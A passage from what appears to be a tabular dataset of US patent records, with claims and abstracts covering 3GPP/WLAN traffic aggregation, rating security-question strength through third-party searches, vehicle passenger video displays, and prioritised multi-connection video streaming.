GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 17. A communication node according to claim 12, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 18. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 19. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 20. A communication node according to claim 12, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 21. A communication node according to claim 12, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 22. A communication node according to claim 20, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 23. (canceled) 24. A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, wherein the communication node comprises:
an establishing module configured to establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and a communicating module configured to communicate data and/or messages across the aggregation interface. 25. A communication node according to claim 24, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 26. A communication node according to claim 25, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 27. A communication node according to claim 24, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 28. A communication node according to claim 25, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 29. A communication node according to claim 24, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 30. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 31. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 32. A communication node according to claim 24, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 33. A communication node according to claim 24, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 34. A communication node according to claim 32, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. | A method and communication node for providing traffic aggregation between a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network. The communication node establishes an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently. The communication node can then communicate data and/or messages over the WLAN network across the aggregation interface, without requiring any modifications or adaptions in the WLAN network. The communication node may be the wireless device or the base station.1. A method performed by a communication node for providing traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to the WLAN network, the method comprising:
establishing an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicating data and/or messages across the aggregation interface. 2. A method according to claim 1, wherein the aggregation interface is implemented as a tunnel in which aggregation frames are encapsulated. 3. A method according to claim 2, wherein the aggregation frames comprise any of: Medium Access Control, MAC, frames, Radio Link Control, RLC, frames and Packet Data Convergence Protocol, PDCP, frames. 4. A method according to claim 2, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 5. A method according to claim 2, wherein the tunnel is implemented as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 6. A method according to claim 1, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 7. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 8. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 9. A method according to claim 1, wherein the communication node is the wireless device, and wherein the wireless device receives address information signalled from the base station and uses the received address information for establishing the aggregation interface. 10. A method according to claim 1, wherein the communication node is the base station, and wherein the base station receives address information signalled from the wireless device and uses the received address information for establishing the aggregation interface. 11. A method according to claim 9, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 12. A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, the communication node comprising a processor (P) and a memory (M), said memory comprising instructions executable by said processor whereby the communication node is configured to:
establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicate data and/or messages across the aggregation interface. 13. A communication node according to claim 12, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 14. A communication node according to claim 13, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 15. A communication node according to claim 13, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 16. A communication node according to claim 13, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 17. A communication node according to claim 12, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 18. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 19. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 20. A communication node according to claim 12, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 21. A communication node according to claim 12, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 22. A communication node according to claim 20, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 23. (canceled) 24. A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, wherein the communication node comprises:
an establishing module configured to establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and a communicating module configured to communicate data and/or messages across the aggregation interface. 25. A communication node according to claim 24, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 26. A communication node according to claim 25, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 27. A communication node according to claim 24, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 28. A communication node according to claim 25, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 29. A communication node according to claim 24, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 30. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 31. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 32. A communication node according to claim 24, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 33. A communication node according to claim 24, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 34. A communication node according to claim 32, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. | 2,400 |
9,163 | 9,163 | 15,133,655 | 2,432 | A device, system, and method validates strength values for security questions associated with an online account. The method performed by an online service server includes receiving a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user. The method includes performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data. The method includes determining a strength value of the security question data based on the search result data. | 1. A method, comprising:
receiving, by an online service server, a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user; performing, by the online service server, a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and determining, by the online service server, a strength value of the security question data based on the search result data. 2. The method of claim 1, further comprising:
receiving, by the online service server, an answer data from the user device, the answer data corresponding to the security question data and being utilized for the use authentication; performing, by the online service server, a further search, using the third party sources, to generate further search result data, the further result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining, by the online service server, a further strength value of the security question data with the answer data based on the further search result data. 3. The method of claim 1, wherein the security question data is selected by the user from a plurality of predetermined security question data. 4. The method of claim 1, further comprising:
receiving, by the online service server, an access grant from the user; and accessing, by the online service server, the third party sources using the access grant. 5. The method of claim 1, further comprising:
transmitting, by the online service server, an indicator to the user device representing the strength value of the security question data. 6. The method of claim 2, further comprising:
transmitting, by the online service server, an indicator to the user device representing the further strength value of the security question data with the answer data. 7. The method of claim 1, further comprising:
comparing, by the online service server, the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating, by the online service server, the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data from the user. 8. The method of claim 1, wherein the performing is performed at a subsequent time, the subsequent time being one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event, and wherein the determining is performed at the subsequent time to determine a subsequent strength value. 9. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to a predetermined threshold value of a minimum security level; and when the subsequent strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data. 10. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to the strength value; and when the subsequent strength value has decreased from the strength value by a predetermined difference value, requesting, by the online service server, an update to the security question data. 11. An online service server, comprising:
a transceiver communicating with a communications network to communicate with a user device utilized by a user, the transceiver receiving a security question data from the user device, the security question data being utilized for a user authentication to access an account of a user; a processor coupled to the transceiver; and a memory arrangement with an executable program stored thereon, the program instructing the processor to perform operations comprising:
performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and
determining a strength value of the security question data based on the search result data. 12. The online service server of claim 13, wherein the transceiver further:
receives an answer data from the user device, the answer data corresponding to the security question data and being utilized for the user authentication, and wherein the program instructing the processor to perform operations further comprising: performing a further search, using the third party sources, to generate further search result data, the further result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining a further strength value of the security question data with the answer data based on the further search result data. 13. The online service server of claim 11, wherein the transceiver further transmits a plurality of predetermined security question data and receives a selection from the user device of the security question data. 14. The online service server of claim 11, wherein the transceiver further receives an access grant from the user, the access grant being used to access the third party sources. 15. The online service server of claim 11, wherein the transceiver further transmits an indicator to the user device representing the strength value of the security question data. 16. The online service server of claim 11, wherein the program instructing the processor to perform operations further comprising:
comparing the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting an update to the security question data from the user. 17. The online service server of claim 11, wherein processor performs the search at a subsequent time. 18. The online service server of claim 17, wherein the subsequent time is one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event. 19. The online service server of claim 11, wherein the online service server is associated with a contact center that manages the account. 20. A method, comprising:
receiving, by an online service server, an access request to access an account of a user from a user device, the account associated with a user account profile data including a security question data, an answer data corresponding to the security question data, and a strength value corresponding to the security question data, the strength value based on search result data of a search using third party sources, the strength value being indicative of an availability value of responses to the security question data; determining, by the online service server, a timer value based on the strength value; transmitting, by the online service server, an answer request to the user device requesting the answer data to be provided for the security question data; and granting, by the online service server, access to the account by the user device when the answer data is received within the timer value. | A device, system, and method validates strength values for security questions associated with an online account. The method performed by an online service server includes receiving a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user. The method includes performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data. The method includes determining a strength value of the security question data based on the search result data.1. A method, comprising:
receiving, by an online service server, a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user; performing, by the online service server, a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and determining, by the online service server, a strength value of the security question data based on the search result data. 2. The method of claim 1, further comprising:
receiving, by the online service server, an answer data from the user device, the answer data corresponding to the security question data and being utilized for the use authentication; performing, by the online service server, a further search, using the third party sources, to generate further search result data, the further result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining, by the online service server, a further strength value of the security question data with the answer data based on the further search result data. 3. The method of claim 1, wherein the security question data is selected by the user from a plurality of predetermined security question data. 4. The method of claim 1, further comprising:
receiving, by the online service server, an access grant from the user; and accessing, by the online service server, the third party sources using the access grant. 5. The method of claim 1, further comprising:
transmitting, by the online service server, an indicator to the user device representing the strength value of the security question data. 6. The method of claim 2, further comprising:
transmitting, by the online service server, an indicator to the user device representing the further strength value of the security question data with the answer data. 7. The method of claim 1, further comprising:
comparing, by the online service server, the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating, by the online service server, the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data from the user. 8. The method of claim 1, wherein the performing is performed at a subsequent time, the subsequent time being one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event, and wherein the determining is performed at the subsequent time to determine a subsequent strength value. 9. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to a predetermined threshold value of a minimum security level; and when the subsequent strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data. 10. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to the strength value; and when the subsequent strength value has decreased from the strength value by a predetermined difference value, requesting, by the online service server, an update to the security question data. 11. An online service server, comprising:
a transceiver communicating with a communications network to communicate with a user device utilized by a user, the transceiver receiving a security question data from the user device, the security question data being utilized for a user authentication to access an account of a user; a processor coupled to the transceiver; and a memory arrangement with an executable program stored thereon, the program instructing the processor to perform operations comprising:
performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and
determining a strength value of the security question data based on the search result data. 12. The online service server of claim 13, wherein the transceiver further:
receives an answer data from the user device, the answer data corresponding to the security question data and being utilized for the user authentication, and wherein the program instructing the processor to perform operations further comprising: performing a further search, using the third party sources, to generate further search result data, the further result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining a further strength value of the security question data with the answer data based on the further search result data. 13. The online service server of claim 11, wherein the transceiver further transmits a plurality of predetermined security question data and receives a selection from the user device of the security question data. 14. The online service server of claim 11, wherein the transceiver further receives an access grant from the user, the access grant being used to access the third party sources. 15. The online service server of claim 11, wherein the transceiver further transmits an indicator to the user device representing the strength value of the security question data. 16. The online service server of claim 11, wherein the program instructing the processor to perform operations further comprising:
comparing the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting an update to the security question data from the user. 17. The online service server of claim 11, wherein processor performs the search at a subsequent time. 18. The online service server of claim 17, wherein the subsequent time is one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event. 19. The online service server of claim 11, wherein the online service server is associated with a contact center that manages the account. 20. A method, comprising:
receiving, by an online service server, an access request to access an account of a user from a user device, the account associated with a user account profile data including a security question data, an answer data corresponding to the security question data, and a strength value corresponding to the security question data, the strength value based on search result data of a search using third party sources, the strength value being indicative of an availability value of responses to the security question data; determining, by the online service server, a timer value based on the strength value; transmitting, by the online service server, an answer request to the user device requesting the answer data to be provided for the security question data; and granting, by the online service server, access to the account by the user device when the answer data is received within the timer value. | 2,400 |
9,164 | 9,164 | 15,917,477 | 2,425 | A passenger compartment of a vehicle includes an overhead video display mounted horizontally proximate the vehicle roof vehicle, and at least one vertical video display mounted proximate the forward or rearward edge of the overhead video display. A computer mounted within the vehicle is coupled to the overhead and vertical video displays for sending coordinated video images thereto, whereby video images appear to travel continuously between the overhead and vertical video displays. A control panel provided in the passenger compartment communicates with the computer for selecting video images to be displayed. A second vertical video display is preferably provided opposite the first vertical video display at the opposing end of the passenger compartment. Additional overhead displays may be added to expand the size of the image displayed overhead. An air cooling duct is formed above the overhead display for passage of cooled air. | 1. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a driver compartment located near the front end of the vehicle, and a passenger compartment located between the driver compartment and the rear end of the vehicle, the passenger compartment having forward and rearward ends and including at least a first passenger seat adapted to seat a first passenger facing toward the rear end of the vehicle; c) a first overhead video display screen mounted within the passenger compartment in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted within the passenger compartment in a generally vertical plane proximate to the rearward end of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed within the passenger compartment, and not within the driver compartment, upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 2. The passenger vehicle recited in claim 1 further including a control panel within the passenger compartment and having a touch-sensitive screen, the control panel being in communication with the computer for selecting video images to be displayed upon the first overhead video display screen and the first vertical video display screen. 3. The passenger vehicle recited in claim 1 wherein a second vertical video display screen is mounted proximate to the forward end of the passenger compartment. 4. (canceled) 5. The passenger vehicle recited in claim 1 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the rear front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first overhead display screen, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the overhead video display screen and the vertical planes of the first and second vertical video display screens. 6. The passenger vehicle recited in claim 1 further including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, the second overhead video display screen being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first and second overhead video display screens, and upon the first vertical video display screen to display images that appear to travel between the composite horizontal display panel and the vertical plane of the first vertical video display screen. 7. The passenger vehicle recited in claim 6 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the composite horizontal display panel, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the composite horizontal display panel video display screen and the vertical planes of the first and second vertical video display screens. 8. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat c) a horizontal support frame secured in fixed relationship within the vehicle below the vehicle roof; d) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment, and wherein the first overhead video display screen is mounted within the horizontal support frame in a fixed horizontal position; d) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 9. The passenger vehicle recited in claim 8 including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, and wherein the second overhead video display screen is mounted within the horizontal support frame. 10. The passenger vehicle recited in claim 8 wherein the horizontal support frame is spaced apart from the vehicle roof to create an air duct between the vehicle roof and the first overhead video display screen, and wherein the vehicle further includes at least one air blower for blowing cooled air through the air duct to avoid overheating the first overhead video display screen. 11. The passenger vehicle recited in claim 8 including a layer of cushioning material interposed between the first overhead video display screen and the horizontal support frame to cushion the first overhead display panel from shock and vibration as the vehicle moves. 12. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat; c) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen; f) at least one electrical storage battery storing low-voltage D.C. electrical power; g) a sine wave power inverter coupled to the at least one electrical storage battery storing low-voltage D.C. electrical power for producing a higher voltage A.C. electrical supply; h) wherein the higher voltage A.C. electrical supply is coupled to the first overhead video display screen and to the computer for supplying electrical power thereto; and i) an audio sound system for producing audio signals within the passenger compartment synchronized with the displayed video images, the audio sound system being coupled to the at least one electrical storage battery for receiving the low-voltage D.C. electrical power to avoid introduction of low frequency A.C. “hum” into the audio sound system. 13. (canceled) | A passenger compartment of a vehicle includes an overhead video display mounted horizontally proximate the vehicle roof vehicle, and at least one vertical video display mounted proximate the forward or rearward edge of the overhead video display. A computer mounted within the vehicle is coupled to the overhead and vertical video displays for sending coordinated video images thereto, whereby video images appear to travel continuously between the overhead and vertical video displays. A control panel provided in the passenger compartment communicates with the computer for selecting video images to be displayed. A second vertical video display is preferably provided opposite the first vertical video display at the opposing end of the passenger compartment. Additional overhead displays may be added to expand the size of the image displayed overhead. An air cooling duct is formed above the overhead display for passage of cooled air.1. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a driver compartment located near the front end of the vehicle, and a passenger compartment located between the driver compartment and the rear end of the vehicle, the passenger compartment having forward and rearward ends and including at least a first passenger seat adapted to seat a first passenger facing toward the rear end of the vehicle; c) a first overhead video display screen mounted within the passenger compartment in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted within the passenger compartment in a generally vertical plane proximate to the rearward end of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed within the passenger compartment, and not within the driver compartment, upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 2. The passenger vehicle recited in claim 1 further including a control panel within the passenger compartment and having a touch-sensitive screen, the control panel being in communication with the computer for selecting video images to be displayed upon the first overhead video display screen and the first vertical video display screen. 3. The passenger vehicle recited in claim 1 wherein a second vertical video display screen is mounted proximate to the forward end of the passenger compartment. 4. (canceled) 5. The passenger vehicle recited in claim 1 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the rear front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first overhead display screen, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the overhead video display screen and the vertical planes of the first and second vertical video display screens. 6. The passenger vehicle recited in claim 1 further including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, the second overhead video display screen being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first and second overhead video display screens, and upon the first vertical video display screen to display images that appear to travel between the composite horizontal display panel and the vertical plane of the first vertical video display screen. 7. The passenger vehicle recited in claim 6 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the composite horizontal display panel, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the composite horizontal display panel video display screen and the vertical planes of the first and second vertical video display screens. 8. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat c) a horizontal support frame secured in fixed relationship within the vehicle below the vehicle roof; d) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment, and wherein the first overhead video display screen is mounted within the horizontal support frame in a fixed horizontal position; d) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 9. The passenger vehicle recited in claim 8 including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, and wherein the second overhead video display screen is mounted within the horizontal support frame. 10. The passenger vehicle recited in claim 8 wherein the horizontal support frame is spaced apart from the vehicle roof to create an air duct between the vehicle roof and the first overhead video display screen, and wherein the vehicle further includes at least one air blower for blowing cooled air through the air duct to avoid overheating the first overhead video display screen. 11. The passenger vehicle recited in claim 8 including a layer of cushioning material interposed between the first overhead video display screen and the horizontal support frame to cushion the first overhead display panel from shock and vibration as the vehicle moves. 12. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat; c) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen; f) at least one electrical storage battery storing low-voltage D.C. electrical power; g) a sine wave power inverter coupled to the at least one electrical storage battery storing low-voltage D.C. electrical power for producing a higher voltage A.C. electrical supply; h) wherein the higher voltage A.C. electrical supply is coupled to the first overhead video display screen and to the computer for supplying electrical power thereto; and i) an audio sound system for producing audio signals within the passenger compartment synchronized with the displayed video images, the audio sound system being coupled to the at least one electrical storage battery for receiving the low-voltage D.C. electrical power to avoid introduction of low frequency A.C. “hum” into the audio sound system. 13. (canceled) | 2,400 |
9,165 | 9,165 | 14,311,698 | 2,458 | Methods, apparatus, systems, and software for implementing context adaptive video streaming using multiple streaming connections. Original video content is split into multiple bitstreams at a video streaming server and streamed to a video streaming client. Higher-importance video content, such as I-frames and the base layer for scalable video coder (SVC) content are streamed over a high-priority streaming connection, while lower-importance video content is streamed over a low-priority streaming connection. The high-priority streaming connection may employ a reliable connection protocol such as TCP protocol, while the lower-priority connection may employ UDP or a modified TCP protocol under which some portions of the bitstream may be dropped. Cross-layer context adaptive streaming may be implemented under which context data such as network context and video application context information may be considered to adjust parameters associated with implement one or more streaming connections. | 1. A method for streaming video content from a video streaming server to a video streaming client, comprising;
splitting video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream; transmitting the plurality of encoded video bitstreams using a plurality of streaming connections, wherein the high priority bitstream is transmitted over a first streaming connection using a reliable transport mechanism, and wherein the low priority bitstream is transmitted using a second streaming connection under which content that is not successfully received may or may not be retransmitted; reassembling the plurality of encoded video bitstreams that are received at the video streaming client into a reassembled encoded video bitstream; and decoding the reassembled encoded video bitstream to playback the video content as a plurality of video frames. 2. The method of claim 1, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 3. The method of claim 1, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) over streaming connection. 4. The method of claim 1, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 5. The method of claim 1, further comprising:
